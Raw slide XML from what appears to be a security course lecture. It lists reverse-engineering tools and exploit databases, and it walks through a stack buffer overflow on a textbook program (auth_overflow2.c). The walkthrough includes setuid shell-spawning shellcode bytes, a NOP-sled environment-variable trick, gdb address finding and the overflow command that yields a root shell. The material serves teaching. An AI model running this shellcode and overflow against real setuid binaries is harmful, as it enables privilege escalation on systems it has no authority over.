            <a:pPr rtl="0" lvl="0" indent="-304800" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en"/>
              <a:t>cat / netcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-304800" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en"/>
              <a:t>readelf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-304800" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en"/>
              <a:t>objdump</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-304800" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en"/>
              <a:t>ltrace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-304800" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" lang="en"/>
              <a:t>strace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-304800" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" lang="en"/>
              <a:t>ROPeme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-304800" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" lang="en"/>
              <a:t>We will cover Return Orient Programming attacks next time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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="577" name="Shape 57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Exploit/Shellcode/Vuln Databases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="578" name="Shape 57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lang="en"/>
              <a:t>http://www.exploit-db.com/search/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://projectshellcode.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://www.shell-storm.org/shellcode/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://nvd.nist.gov/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://cve.mitre.org/</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583" name="Shape 58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Credits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="584" name="Shape 58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Many thanks and credit goes to the following for the material on fuzzing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[1] Mitch Adair - UTDallas Computer Security Group.  http://utdcsg.org/csg/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589" name="Shape 589"/>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Demo#1 Walkthrough</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="590" name="Shape 590"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3600451" x="685800"/>
            <a:ext cy="900599" cx="6400799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use these commands to do what I did at home.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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="595" name="Shape 595"/>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lang="en"/>
              <a:t>An example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="596" name="Shape 59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We're going to exploit the stack frame to change the return address to jump to shellcode that we've hidden in the environment variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lets use auth_overflow2.c from HAOE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>With the live cd, compile auth_overflow2.c with the following commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>reader@hacking:~/booksrc $ gcc -g auth_overflow2.c -o auth_overflow2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>reader@hacking:~/booksrc $ sudo chown root:root ./auth_overflow2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>reader@hacking:~/booksrc $ </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>sudo chmod u+s ./auth_overflow2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>										^ (set suid bit)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>*	I simply set things as root, and suid to easily verify if the exploit works, otherwise might have to break out strace to prove the exploit worked, and that you spawned a NEW shell, instead of returning to the old one :)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>x/24s $esp + 0x1FF</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Other Architecture Ideas and Trends</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Shape 11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Tagged architecture (theoretical)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Each piece of data in the system carries credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>an encryption code that ensures that the data is one that the system trusts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>CPU will not process data with bad credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en"/>
              <a:t>Capability architecture (theoretical)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>requires every software object to carry meta data and specific permission information that describes its access rights on the computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>check is done by a special part of the CPU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en"/>
              <a:t>Trusted Computing Base (TCB)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en"/>
              <a:t>Formal methods....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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="601" name="Shape 60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Our shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="602" name="Shape 60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setup file "shellcode.hex" to contain:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>\xe1\xcd\x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="607" name="Shape 60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Shellcode conversion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="608" name="Shape 60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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We need it in binary form.  So run the following in bash:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ for i in $(cat shellcode.hex); do echo -en $i; done &gt; shellcode.bin</a:t>
            </a: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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Then shellcode.bin will be in binary. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$cat shellcode.bin </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>this will give us a bunch of garbage (thats ok)</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="613" name="Shape 61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Environment Variables :)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="614" name="Shape 61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put the shellcode into environment variables, with a healthy nop-sled.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat shellcode.bin)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>check the result via:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ echo $SHELLCODE</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="619" name="Shape 619"/>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Finding the env vars on the stack with gdb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="620" name="Shape 62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b="1" lang="en"/>
              <a:t>$ gdb ./auth_overflow2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>(gdb) break main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>(gdb) run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>//finds the environment variables on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>(gdb) x/24s $esp + 0x1FF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xbffff8ff:      "SHELLCODE=", '\220' &lt;repeats 190 times&gt;...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xbffff9c7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>"\220\220\220\220\220\220\220\220\220\2201�1�1�\231���\200j\vXQh//shh/bin\211�Q\211�S\211��\200"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xbffff9f5:      "TERM=xterm"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xbffffa00:      "SHELL=/bin/bash"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xbffffa10:      "GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/.gtkrc-1.2-gnome2"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xbffffa4b:      "WINDOWID=20971602"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xbffffa5d:      "USER=reader"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="621" name="Shape 621"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1817691" x="6627288"/>
            <a:ext cy="1237800" cx="2463600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xbffff9c7 is going to be our target return address... right in the middle of that sweet NOP sled</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="626" name="Shape 626"/>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SMASH THE STACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="Shape 627"/>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 ./auth_overflow2 $(perl -e 'print "\xc7\xf9\xff\xbf"x40')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sh-3.2# whoami</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
